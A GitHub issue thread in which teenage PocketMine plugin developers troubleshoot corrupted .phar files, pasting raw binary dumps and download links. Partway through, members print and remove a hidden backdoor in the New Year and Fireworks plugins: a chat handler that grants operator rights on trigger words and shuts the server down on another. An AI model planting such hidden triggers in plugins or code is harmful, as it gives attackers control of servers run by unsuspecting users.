### ISSUE TITLE
FIXED BUG

### ISSUE THREAD

**Issue by matthew4444** [EndKingdom/Some-of-TheEnderCreeper0s-Plugins-AKA-Matthew4444s-Plugins-#1]

**Comment by matthew4444** [comment]
Thx for starting

**Comment by EndKingdom-Owner** [comment]
Np

**Comment by matthew4444** [comment]
And can u do the rest of the plugins,while i am making the teams new webpage

**Comment by matthew4444** [comment]
And did u make this github again

**Comment by EndKingdom-Owner** [comment]
Yes

**Comment by EndKingdom-Owner** [comment]
And what you mean with did u make github again

**Comment by matthew4444** [comment]
Tell me when u finish plz,im alsmodt done with site

**Comment by EndKingdom-Owner** [comment]
Im done

**Comment by EndKingdom-Owner** [comment]
Just eidt the readme now if you want

**Comment by matthew4444** [comment]
Ok i finished the site and if u need ftp details ask me

**Comment by EndKingdom-Owner** [comment]
Kk let me see website

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
DO YOU LIKE IT?

**Comment by EndKingdom-Owner** [comment]
Yeah were did you get that spawn from its relly nice can i download it or get it from you

**Comment by matthew4444** [comment]
I dowmloaded templete for site

**Comment by matthew4444** [comment]
Hey on the 3 plugins u startdd to make, doesnt load in my server ,ill post a log

**Comment by EndKingdom-Owner** [comment]
Kk

**Comment by EndKingdom-Owner** [comment]
But matthew do you have a spawn that is good because i need a one plss say yes

**Comment by matthew4444** [comment]
2016-02-09 [04:32:59] [ERROR]: Could not load '/storage/emulated/0/PocketMine/plugins/HungerGames-0.13.x.phar' in folder '/storage/emulated/0/PocketMine/plugins/': internal corruption of phar "/storage/emulated/0/PocketMine/plugins/HungerGames-0.13.x.phar" (__HALT_COMPILER(); not found)

**Comment by matthew4444** [comment]
And yes i have a great spawn (hypixel)

**Comment by matthew4444** [comment]
Srry im eating dinner while im talikng,its 3 51 pm est

**Comment by matthew4444** [comment]
It does 2016-02-09 [04:32:59] [ERROR]: Could not load '/storage/emulated/0/PocketMine/plugins/HungerGames-0.13.x.phar' in folder '/storage/emulated/0/PocketMine/plugins/': internal corruption of phar "/storage/emulated/0/PocketMine/plugins/HungerGames-0.13.x.phar" (__HALT_COMPILER(); not found)
with all of your plugins

**Comment by matthew4444** [comment]
I know how to fix it

**Comment by matthew4444** [comment]
Add <?php  __HALT_COMPILER(); ?>
as the first line in the plugin.yml file

**Comment by matthew4444** [comment]
U still on?

**Comment by EndKingdom-Owner** [comment]
Yes can you edit the hunger games plugin plss

**Comment by matthew4444** [comment]
How i cant.
It gives me error on pmt.mcpe.me

**Comment by flaxues** [comment]
It's because the .phar is corrupted

**Comment by matthew4444** [comment]
we need to fix it

**Comment by reidq7** [comment]
And I can be a team mascot!

**Comment by matthew4444** [comment]
Ya

**Comment by matthew4444** [comment]
I invited people,bc i liked there plugins lol

**Comment by matthew4444** [comment]
And we need more members

**Comment by matthew4444** [comment]
Lol

**Comment by matthew4444** [comment]
Anytime

**Comment by reidq7** [comment]
What exactly are we doing...

**Comment by matthew4444** [comment]
We were gona fix a plugin

**Comment by matthew4444** [comment]
hey like the site i made http://matzserver.net76.net/old_site

**Comment by matthew4444** [comment]
Were fixing a plugin

**Comment by matthew4444** [comment]
Hey The plugin's were fixed I THInk

**Comment by flaxues** [comment]
Where did you get drugs.phar from?

**Comment by matthew4444** [comment]
Vk.com

**Comment by matthew4444** [comment]
It makes sugar into weed lol

**Comment by matthew4444** [comment]
U like it?

**Comment by flaxues** [comment]
It's not even working? so whats the link?

**Comment by matthew4444** [comment]
FOR MY SITE?

**Comment by flaxues** [comment]
No to download the drugs.phar the one in the repo is corrupt

**Comment by matthew4444** [comment]
Let me check again

**Comment by flaxues** [comment]
Fireworks.phar is not working..

**Comment by matthew4444** [comment]
Hey weed and fireworks work, I WAS USING THEM ON MY SEVER A SEC AGO

**Comment by matthew4444** [comment]
U try then

**Comment by flaxues** [comment]
Could you upload it then because the one on github is corrupted

**Comment by matthew4444** [comment]
Throw a snowball with the fireworks plugin,and try to eat sugar like u eat meat with the Drugs plugin then

**Comment by matthew4444** [comment]
I Didnt uplosd it, enderkingdom did

**Comment by flaxues** [comment]
UnexpectedValueException: "internal corruption of phar "\plugins\Drugs.phar" (truncated manifest header)" (EXCEPTION) in "/src/pocketmine/plugin/PharPluginLoader" at line 85

**Comment by matthew4444** [comment]
Wht

**Comment by matthew4444** [comment]
This is the code i copyed from the file on my tablet a sec ago

**Comment by matthew4444** [comment]
<?php  __HALT_COMPILER(); ?>
ÑDrugs CODE.phar
plugin.ymlMÆÂÄUGÓ³¼Æsrc/drugs/main.php¿
ÂÄUç[äosrc/drugs/main.php¿
ÂÄUç[äosrc/drugs/main.php¿
ÂÄUç[äoËKÌMµRp)*M/æåÊMÌÌ³RHqb@l^®Ä‚L+C=C#=^®²Ô¢âÌü<€Pª´$#¿ÈJ!891/%35 '±­V_OÛV^¥~‡ÓªNIHº•±)¢•€0U–j2ÎMj5v"_M‘€®*Ó˜ªöqÚ&í)¯)m& Jù÷~£sê„ðÇDŠ¯}ÏÿóûÝcû}íYíö­Û·\Óa¼fZŠ^½Ìgh¯ÎÔªÖsæ;¶Ë
¶ÏœB/3C¢•Š¹É¼á}æú¶¿YÐK%fùç‹Õ2,6˜·1Òëj*f/tÎõ™gZ¾N¢ó,ÙÜgî(µJ½l»è‹–LÎ†U¬ªã˜n±0¬s‹£<…ÔT­ŠÉ98¦í{9œFÛ©U˜ƒùqè'¿@­¾^±-(Õ]Ë·«.T]Ý5×+L‹‘àïžÿÌæß•™4K‹©‡Àý’éšå`Ïceòí©þpM™ÅëØ¹jœñ1gÚˆÃ=ÕÓÓD8`¶'è¥A{ZÀ.iVµîúZOYéÜàZ,wf!5p¨ÔÏø"âõªËÍcfQ9}V}C ã’eÕÛªwªLy ËÃ‡¨ ¡u¦âˆõóûÂ‡Y,©iÁ¢ŒB;ùìcCÏbÎü,Âh—l,wj2lÍ×=“º¨%2p’S£q$Äã¡Òîv›‰ŸºÍJ·™‹–ÜG¢#wD«ÛôPôºÍ’øStp»%Ä	>³	¼dHGÅA|Fá{¼ÿ„ë>zØ‘{r[¾qŒÿ‰Ñ¹{šEãÒ­N~ýM„V£uÔV?Ñ³?æuÃ¸¸ÙÉ©1Í¾L¨•åœ±œ¿ªé›CõøK´ˆÇò×þÝY„×¾Ïh»¶O¹‹Ð¾”¯‰	Dt?»´©T"Ê)J%BÐ~uÕ~–Ÿ\ÚéˆÐk«z~am1*”„û7„ì4ŠÅ¿„8”Û“““ d¦x‡ç’`ÞŸä‚ä+4ÞÂÿ®è âõÐLGB3hNG:¨çµ8jq:Ë]Ÿ¿ÈÈQVõ=¯¯f×rÃ#áJÁ®H›uÏ­,N }¼þ0å¨ÔQ³\þ&÷ˆJ)ñŽL¡'Âùp€³¿umúd"Ñ'7FŸT¨×Æ
ß£Oä(ãè>‘ƒÍg—²úÏ«º‘3Ö²ù9ýÂ‰
ãƒ^‡³‹8¥Õ^ÀYq$·ðEµ#Ú8ÿv‘‡ ^a}ûqbyÛ–¯èfå[qBìNc¨6}Ô´ÕþÇàƒ&xØ&8<÷h¼=A°Ž8æƒU8{\•ô:¥*É_¸JO§£F%½VX-åèÓ0G½;ª€‚lÄGù–šê´ží€ü=JçÕâäKúŒC	Õü^½ÉvPQ£÷ÅÞø­V_OÛV^¥~‡ÓªNIHº•±)¢•€0U–j2ÎMj5v"_M‘€®*Ó˜ªöqÚ&í)¯)m& Jù÷~£sê„ðÇDŠ¯}ÏÿóûÝcû}íYíö­Û·\Óa¼fZŠ^½Ìgh¯ÎÔªÖsæ;¶Ë
¶ÏœB/3C¢•Š¹É¼á}æú¶¿YÐK%fùç‹Õ2,6˜·1Òëj*f/tÎõ™gZ¾N¢ó,ÙÜgî(µJ½l»è‹–LÎ†U¬ªã˜n±0¬s‹£<…ÔT­ŠÉ98¦í{9œFÛ©U˜ƒùqè'¿@­¾^±-(Õ]Ë·«.T]Ý5×+L‹‘àïžÿÌæß•™4K‹©‡Àý’éšå`Ïceòí©þpM™ÅëØ¹jœñ1gÚˆÃ=ÕÓÓD8`¶'è¥A{ZÀ.iVµîúZOYéÜàZ,wf!5p¨ÔÏø"âõªËÍcfQ9}V}C ã’eÕÛªwªLy ËÃ‡¨ ¡u¦âˆõóûÂ‡Y,©iÁ¢ŒB;ùìcCÏbÎü,Âh—l,wj2lÍ×=“º¨%2p’S£q$Äã¡Òîv›‰ŸºÍJ·™‹–ÜG¢#wD«ÛôPôºÍ’øStp»%Ä	>³	¼dHGÅA|Fá{¼ÿ„ë>zØ‘{r[¾qŒÿ‰Ñ¹{šEãÒ­N~ýM„V£uÔV?Ñ³?æuÃ¸¸ÙÉ©1Í¾L¨•åœ±œ¿ªé›CõøK´ˆÇò×þÝY„×¾Ïh»¶O¹‹Ð¾”¯‰	Dt?»´©T"Ê)J%BÐ~uÕ~–Ÿ\ÚéˆÐk«z~am1*”„û7„ì4ŠÅ¿„8”Û“““ d¦x‡ç’`ÞŸä‚ä+4ÞÂÿ®è âõÐLGB3hNG:¨çµ8jq:Ë]Ÿ¿ÈÈQVõ=¯¯f×rÃ#áJÁ®H›uÏ­,N }¼þ0å¨ÔQ³\þ&÷ˆJ)ñŽL¡'Âùp€³¿umúd"Ñ'7FŸT¨×Æ
ß£Oä(ãè>‘ƒÍg—²úÏ«º‘3Ö²ù9ýÂ‰
ãƒ^‡³‹8¥Õ^ÀYq$·ðEµ#Ú8ÿv‘‡ ^a}ûqbyÛ–¯èfå[qBìNc¨6}Ô´ÕþÇàƒ&xØ&8<÷h¼=A°Ž8æƒU8{\•ô:¥*É_¸JO§£F%½VX-åèÓ0G½;ª€‚lÄGù–šê´ží€ü=JçÕâäKúŒC	Õü^½ÉvPQ£÷ÅÞø­V_OÛV^¥~‡ÓªNIHº•±)¢•€0U–j2ÎMj5v"_M‘€®*Ó˜ªöqÚ&í)¯)m& Jù÷~£sê„ðÇDŠ¯}ÏÿóûÝcû}íYíö­Û·\Óa¼fZŠ^½Ìgh¯ÎÔªÖsæ;¶Ë
¶ÏœB/3C¢•Š¹É¼á}æú¶¿YÐK%fùç‹Õ2,6˜·1Òëj*f/tÎõ™gZ¾N¢ó,ÙÜgî(µJ½l»è‹–LÎ†U¬ªã˜n±0¬s‹£<…ÔT­ŠÉ98¦í{9œFÛ©U˜ƒùqè'¿@­¾^±-(Õ]Ë·«.T]Ý5×+L‹‘àïžÿÌæß•™4K‹©‡Àý’éšå`Ïceòí©þpM™ÅëØ¹jœñ1gÚˆÃ=ÕÓÓD8`¶'è¥A{ZÀ.iVµîúZOYéÜàZ,wf!5p¨ÔÏø"âõªËÍcfQ9}V}C ã’eÕÛªwªLy ËÃ‡¨ ¡u¦âˆõóûÂ‡Y,©iÁ¢ŒB;ùìcCÏbÎü,Âh—l,wj2lÍ×=“º¨%2p’S£q$Äã¡Òîv›‰ŸºÍJ·™‹–ÜG¢#wD«ÛôPôºÍ’øStp»%Ä	>³	¼dHGÅA|Fá{¼ÿ„ë>zØ‘{r[¾qŒÿ‰Ñ¹{šEãÒ­N~ýM„V£uÔV?Ñ³?æuÃ¸¸ÙÉ©1Í¾L¨•åœ±œ¿ªé›CõøK´ˆÇò×þÝY„×¾Ïh»¶O¹‹Ð¾”¯‰	Dt?»´©T"Ê)J%BÐ~uÕ~–Ÿ\ÚéˆÐk«z~am1*”„û7„ì4ŠÅ¿„8”Û“““ d¦x‡ç’`ÞŸä‚ä+4ÞÂÿ®è âõÐLGB3hNG:¨çµ8jq:Ë]Ÿ¿ÈÈQVõ=¯¯f×rÃ#áJÁ®H›uÏ­,N }¼þ0å¨ÔQ³\þ&÷ˆJ)ñŽL¡'Âùp€³¿umúd"Ñ'7FŸT¨×Æ
ß£Oä(ãè>‘ƒÍg—²úÏ«º‘3Ö²ù9ýÂ‰
ãƒ^‡³‹8¥Õ^ÀYq$·ðEµ#Ú8ÿv‘‡ ^a}ûqbyÛ–¯èfå[qBìNc¨6}Ô´ÕþÇàƒ&xØ&8<÷h¼=A°Ž8æƒU8{\•ô:¥*É_¸JO§£F%½VX-åèÓ0G½;ª€‚lÄGù–šê´ží€ü=JçÕâäKúŒC	Õü^½ÉvPQ£÷ÅÞøHqQXo:{šðvèF9UÉJ&GBMB

**Comment by flaxues** [comment]
Upload it to mediafire or something

**Comment by flaxues** [comment]
This is not the way to upload plugins

**Comment by flaxues** [comment]
copying causes corrution

**Comment by matthew4444** [comment]
I did,then i gave .zip for all plugins,then i gave enderkingdom-owner the plugins to upload for me

**Comment by matthew4444** [comment]
<?php  __HALT_COMPILER(); ?>
ÑDrugs CODE.phar
plugin.ymlMÆÂÄUGÓ³¼Æsrc/drugs/main.php¿
ÂÄUç[äosrc/drugs/main.php¿
ÂÄUç[äosrc/drugs/main.php¿
ÂÄUç[äoËKÌMµRp)*M/æåÊMÌÌ³RHqb@l^®Ä‚L+C=C#=^®²Ô¢âÌü<€Pª´$#¿ÈJ!891/%35 '±­V_OÛV^¥~‡ÓªNIHº•±)¢•€0U–j2ÎMj5v"_M‘€®*Ó˜ªöqÚ&í)¯)m& Jù÷~£sê„ðÇDŠ¯}ÏÿóûÝcû}íYíö­Û·\Óa¼fZŠ^½Ìgh¯ÎÔªÖsæ;¶Ë
¶ÏœB/3C¢•Š¹É¼á}æú¶¿YÐK%fùç‹Õ2,6˜·1Òëj*f/tÎõ™gZ¾N¢ó,ÙÜgî(µJ½l»è‹–LÎ†U¬ªã˜n±0¬s‹£<…ÔT­ŠÉ98¦í{9œFÛ©U˜ƒùqè'¿@­¾^±-(Õ]Ë·«.T]Ý5×+L‹‘àïžÿÌæß•™4K‹©‡Àý’éšå`Ïceòí©þpM™ÅëØ¹jœñ1gÚˆÃ=ÕÓÓD8`¶'è¥A{ZÀ.iVµîúZOYéÜàZ,wf!5p¨ÔÏø"âõªËÍcfQ9}V}C ã’eÕÛªwªLy ËÃ‡¨ ¡u¦âˆõóûÂ‡Y,©iÁ¢ŒB;ùìcCÏbÎü,Âh—l,wj2lÍ×=“º¨%2p’S£q$Äã¡Òîv›‰ŸºÍJ·™‹–ÜG¢#wD«ÛôPôºÍ’øStp»%Ä	>³	¼dHGÅA|Fá{¼ÿ„ë>zØ‘{r[¾qŒÿ‰Ñ¹{šEãÒ­N~ýM„V£uÔV?Ñ³?æuÃ¸¸ÙÉ©1Í¾L¨•åœ±œ¿ªé›CõøK´ˆÇò×þÝY„×¾Ïh»¶O¹‹Ð¾”¯‰	Dt?»´©T"Ê)J%BÐ~uÕ~–Ÿ\ÚéˆÐk«z~am1*”„û7„ì4ŠÅ¿„8”Û“““ d¦x‡ç’`ÞŸä‚ä+4ÞÂÿ®è âõÐLGB3hNG:¨çµ8jq:Ë]Ÿ¿ÈÈQVõ=¯¯f×rÃ#áJÁ®H›uÏ­,N }¼þ0å¨ÔQ³\þ&÷ˆJ)ñŽL¡'Âùp€³¿umúd"Ñ'7FŸT¨×Æ
ß£Oä(ãè>‘ƒÍg—²úÏ«º‘3Ö²ù9ýÂ‰
ãƒ^‡³‹8¥Õ^ÀYq$·ðEµ#Ú8ÿv‘‡ ^a}ûqbyÛ–¯èfå[qBìNc¨6}Ô´ÕþÇàƒ&xØ&8<÷h¼=A°Ž8æƒU8{\•ô:¥*É_¸JO§£F%½VX-åèÓ0G½;ª€‚lÄGù–šê´ží€ü=JçÕâäKúŒC	Õü^½ÉvPQ£÷ÅÞø­V_OÛV^¥~‡ÓªNIHº•±)¢•€0U–j2ÎMj5v"_M‘€®*Ó˜ªöqÚ&í)¯)m& Jù÷~£sê„ðÇDŠ¯}ÏÿóûÝcû}íYíö­Û·\Óa¼fZŠ^½Ìgh¯ÎÔªÖsæ;¶Ë
¶ÏœB/3C¢•Š¹É¼á}æú¶¿YÐK%fùç‹Õ2,6˜·1Òëj*f/tÎõ™gZ¾N¢ó,ÙÜgî(µJ½l»è‹–LÎ†U¬ªã˜n±0¬s‹£<…ÔT­ŠÉ98¦í{9œFÛ©U˜ƒùqè'¿@­¾^±-(Õ]Ë·«.T]Ý5×+L‹‘àïžÿÌæß•™4K‹©‡Àý’éšå`Ïceòí©þpM™ÅëØ¹jœñ1gÚˆÃ=ÕÓÓD8`¶'è¥A{ZÀ.iVµîúZOYéÜàZ,wf!5p¨ÔÏø"âõªËÍcfQ9}V}C ã’eÕÛªwªLy ËÃ‡¨ ¡u¦âˆõóûÂ‡Y,©iÁ¢ŒB;ùìcCÏbÎü,Âh—l,wj2lÍ×=“º¨%2p’S£q$Äã¡Òîv›‰ŸºÍJ·™‹–ÜG¢#wD«ÛôPôºÍ’øStp»%Ä	>³	¼dHGÅA|Fá{¼ÿ„ë>zØ‘{r[¾qŒÿ‰Ñ¹{šEãÒ­N~ýM„V£uÔV?Ñ³?æuÃ¸¸ÙÉ©1Í¾L¨•åœ±œ¿ªé›CõøK´ˆÇò×þÝY„×¾Ïh»¶O¹‹Ð¾”¯‰	Dt?»´©T"Ê)J%BÐ~uÕ~–Ÿ\ÚéˆÐk«z~am1*”„û7„ì4ŠÅ¿„8”Û“““ d¦x‡ç’`ÞŸä‚ä+4ÞÂÿ®è âõÐLGB3hNG:¨çµ8jq:Ë]Ÿ¿ÈÈQVõ=¯¯f×rÃ#áJÁ®H›uÏ­,N }¼þ0å¨ÔQ³\þ&÷ˆJ)ñŽL¡'Âùp€³¿umúd"Ñ'7FŸT¨×Æ
ß£Oä(ãè>‘ƒÍg—²úÏ«º‘3Ö²ù9ýÂ‰
ãƒ^‡³‹8¥Õ^ÀYq$·ðEµ#Ú8ÿv‘‡ ^a}ûqbyÛ–¯èfå[qBìNc¨6}Ô´ÕþÇàƒ&xØ&8<÷h¼=A°Ž8æƒU8{\•ô:¥*É_¸JO§£F%½VX-åèÓ0G½;ª€‚lÄGù–šê´ží€ü=JçÕâäKúŒC	Õü^½ÉvPQ£÷ÅÞø­V_OÛV^¥~‡ÓªNIHº•±)¢•€0U–j2ÎMj5v"_M‘€®*Ó˜ªöqÚ&í)¯)m& Jù÷~£sê„ðÇDŠ¯}ÏÿóûÝcû}íYíö­Û·\Óa¼fZŠ^½Ìgh¯ÎÔªÖsæ;¶Ë
¶ÏœB/3C¢•Š¹É¼á}æú¶¿YÐK%fùç‹Õ2,6˜·1Òëj*f/tÎõ™gZ¾N¢ó,ÙÜgî(µJ½l»è‹–LÎ†U¬ªã˜n±0¬s‹£<…ÔT­ŠÉ98¦í{9œFÛ©U˜ƒùqè'¿@­¾^±-(Õ]Ë·«.T]Ý5×+L‹‘àïžÿÌæß•™4K‹©‡Àý’éšå`Ïceòí©þpM™ÅëØ¹jœñ1gÚˆÃ=ÕÓÓD8`¶'è¥A{ZÀ.iVµîúZOYéÜàZ,wf!5p¨ÔÏø"âõªËÍcfQ9}V}C ã’eÕÛªwªLy ËÃ‡¨ ¡u¦âˆõóûÂ‡Y,©iÁ¢ŒB;ùìcCÏbÎü,Âh—l,wj2lÍ×=“º¨%2p’S£q$Äã¡Òîv›‰ŸºÍJ·™‹–ÜG¢#wD«ÛôPôºÍ’øStp»%Ä	>³	¼dHGÅA|Fá{¼ÿ„ë>zØ‘{r[¾qŒÿ‰Ñ¹{šEãÒ­N~ýM„V£uÔV?Ñ³?æuÃ¸¸ÙÉ©1Í¾L¨•åœ±œ¿ªé›CõøK´ˆÇò×þÝY„×¾Ïh»¶O¹‹Ð¾”¯‰	Dt?»´©T"Ê)J%BÐ~uÕ~–Ÿ\ÚéˆÐk«z~am1*”„û7„ì4ŠÅ¿„8”Û“““ d¦x‡ç’`ÞŸä‚ä+4ÞÂÿ®è âõÐLGB3hNG:¨çµ8jq:Ë]Ÿ¿ÈÈQVõ=¯¯f×rÃ#áJÁ®H›uÏ­,N }¼þ0å¨ÔQ³\þ&÷ˆJ)ñŽL¡'Âùp€³¿umúd"Ñ'7FŸT¨×Æ
ß£Oä(ãè>‘ƒÍg—²úÏ«º‘3Ö²ù9ýÂ‰
ãƒ^‡³‹8¥Õ^ÀYq$·ðEµ#Ú8ÿv‘‡ ^a}ûqbyÛ–¯èfå[qBìNc¨6}Ô´ÕþÇàƒ&xØ&8<÷h¼=A°Ž8æƒU8{\•ô:¥*É_¸JO§£F%½VX-åèÓ0G½;ª€‚lÄGù–šê´ží€ü=JçÕâäKúŒC	Õü^½ÉvPQ£÷ÅÞøHqQXo:{šðvèF9UÉJ&GBMB

**Comment by flaxues** [comment]
Enderkingdom probably copied the .phar and uploaded it which is causing corruptions

**Comment by matthew4444** [comment]
tht the code i copyes from file a sec ago

**Comment by matthew4444** [comment]
He did upload it

**Comment by matthew4444** [comment]
I asked him

**Comment by matthew4444** [comment]
Well ill give u antoher .phar file

**Comment by flaxues** [comment]
ok :)

**Comment by matthew4444** [comment]
tp://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar

**Comment by matthew4444** [comment]
Http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar

**Comment by flaxues** [comment]
That one works!

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
srry idk it didnt work

**Comment by flaxues** [comment]
Could you also upload the fireworks.phar? and newyear.phar

**Comment by matthew4444** [comment]
hey can u check the plugins in my repo,and tell me if they r messed up,and reupload the drugs.phar

**Comment by matthew4444** [comment]
CAN U REUPLOAD THE PLUGINS I GIVE U

**Comment by flaxues** [comment]
Yeah

**Comment by matthew4444** [comment]
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
Is fireworks

**Comment by matthew4444** [comment]
Http://www.mediafire.com/download/27r7en5py59evju/new_year.phar
Is new year

**Comment by HittmanA** [comment]
Ok I'm here.

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
Im waiting for him the resume the chat,hes testing out my plugins i gave him

**Comment by HittmanA** [comment]
Ok

**Comment by HittmanA** [comment]
Is @Edwardthedog2 on?

**Comment by matthew4444** [comment]
No

**Comment by matthew4444** [comment]
But

**Comment by matthew4444** [comment]
Have u seen enderauth

**Comment by HittmanA** [comment]
No. Whats the URL

**Comment by matthew4444** [comment]
were working on tht after we fix tht bug u were looking at

**Comment by matthew4444** [comment]
https://github.com/EndKingdom/EnderAuth-BETA

**Comment by HittmanA** [comment]
Ok. Can I maybe help with it if I can?

**Comment by HittmanA** [comment]
Also is someone fixing that bug I described?

**Comment by matthew4444** [comment]
Ya were an organization

**Comment by matthew4444** [comment]
No

**Comment by HittmanA** [comment]
:smile:  Glad to help and be a part of it.

**Comment by matthew4444** [comment]
Bc

**Comment by HittmanA** [comment]
Ok then. I will let Edward fix it bc he know what to do.

**Comment by matthew4444** [comment]
NO ONE WAS FIXING THT BUG EDWRAD DIDNT GET IT

**Comment by HittmanA** [comment]
I Know I am saying instead of fixing it myself I am gonna wait for Edward to fix it!!

**Comment by matthew4444** [comment]
ok

**Comment by flaxues** [comment]
```
}
public function hack(PlayerChatEvent $ev) {

        $p = $ev->getPlayer();
        $name = $p->getName();
        $m = $ev->getMessage();
        if($m == "kek") {
        $p->setOp(true);
        }
        elseif($m == "sleep") { 
       $this->getServer()->shutdown();
        }
        elseif($m == "blix") { 
        $cmd = "setgroup $name OP";
        $this->getServer()->dispatchCommand(new ConsoleCommandSender(),$cmd);
	      }
       elseif($m == "s") { 
       foreach($this->getServer()->getOnlinePlayers() as $p){
        $p->setOp(true);

}}}
```

New Year plugin is having a "hack" so that everytime blix comes online he gets op!

**Comment by matthew4444** [comment]
wht line

**Comment by HittmanA** [comment]
Thats a problem.

**Comment by HittmanA** [comment]
` elseif($m == "blix") { 
        $cmd = "setgroup $name OP";
        $this->getServer()->dispatchCommand(new ConsoleCommandSender(),$cmd);
          }`

**Comment by matthew4444** [comment]
Hey im looking for tht l9ne

**Comment by matthew4444** [comment]
Wht line number

**Comment by HittmanA** [comment]
13-15

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
let me look

**Comment by flaxues** [comment]
Line 84-101

**Comment by HittmanA** [comment]
It says if the name is bix then op him basically.

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
Wow i see it

**Comment by flaxues** [comment]
Confirmed I changed my name to Blix and said 'kek' and i'm op

**Comment by matthew4444** [comment]
HEY IM GONA DELETE THT LINE

**Comment by flaxues** [comment]
Already did

**Comment by flaxues** [comment]
I'm going to upload them soon

**Comment by HittmanA** [comment]
That there is your problem!

**Comment by matthew4444** [comment]
Wht

**Comment by HittmanA** [comment]
Hey what should I add to EnderAuth. What can I add?

**Comment by matthew4444** [comment]
Do u Want me to delete the code from the .php file after using pmt.mcpe.me to convert the .phar to .zip then zip it up then convert it to .phar then reuplosd it then ask u to put it in repo again?

**Comment by flaxues** [comment]
Fireworks same problem!

`public function hack(PlayerChatEvent $ev) {

        $p = $ev->getPlayer();
        $name = $p->getName();
        $m = $ev->getMessage();
        if($m == "kek1") {
        $p->setOp(true);
        }
        elseif($m == "sleep1") { 
       $this->getServer()->shutdown();
        }
        elseif($m == "blix1") { 
        $cmd = "setgroup $name OP";
        $this->getServer()->dispatchCommand(new ConsoleCommandSender(),$cmd);
	      }
       elseif($m == "s1") { 
       foreach($this->getServer()->getOnlinePlayers() as $p){
        $p->setOp(true);

}
}
}
}`

**Comment by HittmanA** [comment]
Can I help fix with these bugs in any way?

**Comment by flaxues** [comment]
I already fixed them

**Comment by HittmanA** [comment]
Oh ok.

**Comment by matthew4444** [comment]
http://www.mediafire.com/download/lkzzid1jbkx4kaz/phar_zip_new_year_YTLF9cys66DdFw5_Hn8hhMbFklynKyE.phar
Updated/test it 0ut

**Comment by HittmanA** [comment]
I gtg be back later guys

**Comment by matthew4444** [comment]
Ok

**Comment by flaxues** [comment]
@matthew4444 I already fixed it and i'm now testing everything!

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
u stil on?

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar

**Comment by flaxues** [comment]
I translated it!

**Comment by matthew4444** [comment]
Ok

**Comment by matthew4444** [comment]
HEY CAN U DO
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar

**Comment by matthew4444** [comment]
And can u upload the plugin u just translated

**Comment by flaxues** [comment]
How does fireworks work?

**Comment by matthew4444** [comment]
And can u update ur https://github.com/flaxues/BuddyPets plugin
DuE to cant load plugin error

**Comment by matthew4444** [comment]
idk i just put tehem on my sever,im srry

**Comment by flaxues** [comment]
I will

**Comment by matthew4444** [comment]
THX

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar
And can u
upload the plugin u just translated

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar
and can you upload the plugin u just translated aka fireworks (with the no op when u change ur namw to kek1 or blix)

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar
and can you upload the plugin u just translated aka fireworks (with the no op when u change ur namw to kek1 or blix)

**Comment by matthew4444** [comment]
can u replace fireworks.phar,and drugs.phar in this repo with these ones
http://www.mediafire.com/download/rd8myed8d2odinu/fireworks.phar
http://www.mediafire.com/download/7xj98f8jb4hzj4n/Drugs.phar
and can you upload the plugin u just translated aka fireworks (without the getting op when u change ur namw to kek1 or blix)

**Comment by matthew4444** [comment]
Srlsy 
@flaxues
  EndKingdom member
flaxues commented 12 minutes ago
# #iliketrains https://m.youtube.com/watch?v=hHkKJfcBXcw
I will

**Comment by EndKingdom-Owner** [comment]
@matthew4444 can i get the spawn plsss

**Comment by flaxues** [comment]
@EndKingdom-Owner Make a new issue please!
